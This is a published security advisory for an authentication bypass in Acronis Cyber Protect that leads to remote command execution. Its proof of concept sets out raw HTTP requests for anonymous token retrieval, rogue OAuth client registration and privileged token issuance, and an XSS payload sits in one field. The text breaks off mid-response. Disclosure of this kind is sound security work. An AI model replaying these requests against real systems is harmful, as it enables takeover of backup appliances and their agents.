{"id":19123,"date":"2022-11-08T15:41:56","date_gmt":"2022-11-08T14:41:56","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19123"},"modified":"2024-06-24T16:09:04","modified_gmt":"2024-06-24T14:09:04","slug":"usd-2022-0008","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0008\/","title":{"rendered":"usd-2022-0008"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n<h2><\/h2>\n<h1>usd-2022-008 | Authentication Bypass with subsequent Remote Command Execution in Acronis Cyber Protect<\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2022-0008<br \/>\n<strong>Product<\/strong>: Acronis Cyber Protect<br \/>\n<strong>Affected Version<\/strong>: Server Version 15.0.28503<br \/>\n<strong>Vulnerability Type<\/strong>: Authentication Bypass (CWE-305)<br \/>\n<strong>Security Risk<\/strong>: Critical<br \/>\n<strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.acronis.com\/en-us\/products\/cyber-protect\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.acronis.com\/en-us\/products\/cyber-protect\/<\/a><br \/>\n<strong>Vendor Status<\/strong>: Fixed<br \/>\n<strong>CVE IDs<\/strong>: CVE-2022-3405, CVE-2022-30995<br \/>\n<strong>CVE Links<\/strong>: <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-3405\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-3405<\/a>, <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30995\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30995<\/a><\/p>\n<p>&nbsp;[\/et_pb_text][et_pb_code _builder_version=\"4.18.1\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_code][et_pb_code _builder_version=\"4.18.1\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_code][et_pb_text _builder_version=\"4.25.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h3><span style=\"color: #86cccf;\">Introduction<\/span><\/h3>\n<p>The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous registration of new backup\/protection agents on new endpoints. This API endpoint also generates bearer tokens which the agent then uses to authenticate to the appliance. As the management web console is running on the same port as the API for the agents, this bearer token is also valid for any actions on the web console. This allows an attacker with network access to the appliance to start the registration of a new agent, retrieve a bearer token and then manipulate any settings on the appliance via the available functions in the web console. The web console contains multiple possibilities to execute arbitrary commands on both the agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation job on the agent of the appliance). These options can easily be set with the provided bearer token, which leads to a complete compromise of all agents and the appliance itself.<\/p>\n<h3><span style=\"color: #86cccf;\">Proof of Concept<\/span><\/h3>\n<p>A high-privileged <strong>access_token<\/strong> can be obtained as follows:<\/p>\n<ol>\n<li>Send <em>Token Request<\/em> using <em>Resource Owner Password Credentials<\/em> flow (<strong>grant_type=password<\/strong>)<\/li>\n<\/ol>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"nf\" style=\"background: #263238; color: #82aaff;\">POST<\/span> <span class=\"nn\" style=\"background: #263238; color: #ffcb6b;\">\/idp\/token<\/span> <span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Host<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">172.16.164.130:9877<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">User-Agent<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">Go-http-client\/1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">39<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Type<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">application\/x-www-form-urlencoded<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">gzip<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p>grant_type=password&amp;password=&amp;username=<\/p>\n<\/div>\n<p>The IdP responds with an <strong>access_token<\/strong>: <strong>AT1<\/strong><\/p>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span> <span class=\"m\" style=\"background: #263238; color: #f78c6c;\">200<\/span> <span class=\"ne\" style=\"background: #263238; color: #ffcb6b;\">OK<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">2475<\/span>\n<span class=\"err\" style=\"background: #263238; color: #ff5370;\">[...]<\/span>{\"access_token\":\"eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoiWVV4cUV3ZXY4MmVTRXVpQkJGM1loVSIsImtpZCI6IjZjOWIx[REDACTED]\",\"token_type\":\"bearer\",\"expires_in\":86399,\"expires_on\":1644158167,\"id_token\":\"eyJhbGciOiJSUzI1NiIsImtpZCI6IjZjOWI[...]\",\"scope\":\"urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(backup_agent) urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(backup_storage) urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_registrar urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:anonymous urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin\"}<\/pre>\n<\/div>\n<ol>\n<li><strong>AT1<\/strong> can in the following be used to register an OAuth 2.0 client as follows:<\/li>\n<\/ol>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"nf\" style=\"background: #263238; color: #82aaff;\">POST<\/span> <span class=\"nn\" style=\"background: #263238; color: #ffcb6b;\">\/api\/agent_manager\/v2\/agent_registrations<\/span> <span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Host<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">172.16.164.130:9877<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">1314<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Authorization<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">bearer eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoiW[REDACTED:AT1]<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Type<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">application\/json<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">gzip<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p><span class=\"p\" style=\"background: #263238; color: #89ddff;\">{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"51088f07-76df-4933-8382-ce8ad4c58401\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"oauth_client_secret\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"56632gryjzvcqfk2aiogwpxup4a6pgfdrdwvyiesz4l6f7lvhj44\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"hostname\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"test\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"core_version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1.15.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"348\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"units\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:[{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"crs\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"sh-inventory\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"task-manager\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"atp-agent\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"atp-downloader\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"atp-scan-agent\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"active_protection\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"mms\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"sync-unit\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}},{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"cyber-protect-service\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"current\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"0.0.0\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}}}],<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"meta\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"auto_update\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"kc\" style=\"background: #263238; color: #89ddff;\">false<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"installer_version\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"release_id\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"15.0.1\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"build\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"28503\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"platform\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:{<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"family\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"WINDOWS\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"arch\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"X64\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"name\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"\\\\\"'&lt;svg\/onload=alert(1);&gt;;#--\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version_major\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"mi\" style=\"background: #263238; color: #f78c6c;\">0<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"version_minor\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"mi\" style=\"background: #263238; color: #f78c6c;\">0<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">},<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"zmq_agent_public_key\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"lGfb+FxD.M?1wA6Hk+@LH:RlPY4A]W)vqJ=EWX2f\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">,<\/span><span class=\"nt\" style=\"background: #263238; color: #ff5370;\">\"timezone\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">:<\/span><span class=\"s2\" style=\"background: #263238; color: #c3e88d;\">\"+0100\"<\/span><span class=\"p\" style=\"background: #263238; color: #89ddff;\">}<\/span><span class=\"w\" style=\"background: #263238; color: #eff;\"><\/span><\/p>\n<\/div>\n<p>The above request includes a controlled \"id\" (=<strong>client_id<\/strong>) and \"oauth_client_secret\" (=<strong>client_secret<\/strong>).<\/p>\n<ol>\n<li>The aforementioned <strong>client_id<\/strong> and <strong>client_secret<\/strong> can then be used to perform a <em>Client Credentials Flow<\/em> (<strong>grant_type=client_credentials<\/strong>) to obtain a high-privileged <strong>access_token<\/strong> <strong>AT2<\/strong>:<\/li>\n<\/ol>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"nf\" style=\"background: #263238; color: #82aaff;\">POST<\/span> <span class=\"nn\" style=\"background: #263238; color: #ffcb6b;\">\/idp\/token<\/span> <span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Host<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">172.16.164.130:9877<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">User-Agent<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">Go-http-client\/1.1<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">143<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Type<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">application\/x-www-form-urlencoded<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">gzip<\/span><\/pre>\n<p>&nbsp;<\/p>\n<p>client_id=51088f07-76df-4933-8382-ce8ad4c58401&amp;client_secret=56632gryjzvcqfk2aiogwpxup4a6pgfdrdwvyiesz4l6f7lvhj44&amp;grant_type=client_credentials<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<p>The IdP responds as follows:<\/p>\n<div class=\"codehilite\" style=\"background: #263238; color: #eff;\">\n<pre style=\"line-height: 125%;\"><span style=\"background: #263238;\"><\/span><span class=\"kr\" style=\"background: #263238; color: #bb80b3;\">HTTP<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">\/<\/span><span class=\"m\" style=\"background: #263238; color: #f78c6c;\">1.1<\/span> <span class=\"m\" style=\"background: #263238; color: #f78c6c;\">200<\/span> <span class=\"ne\" 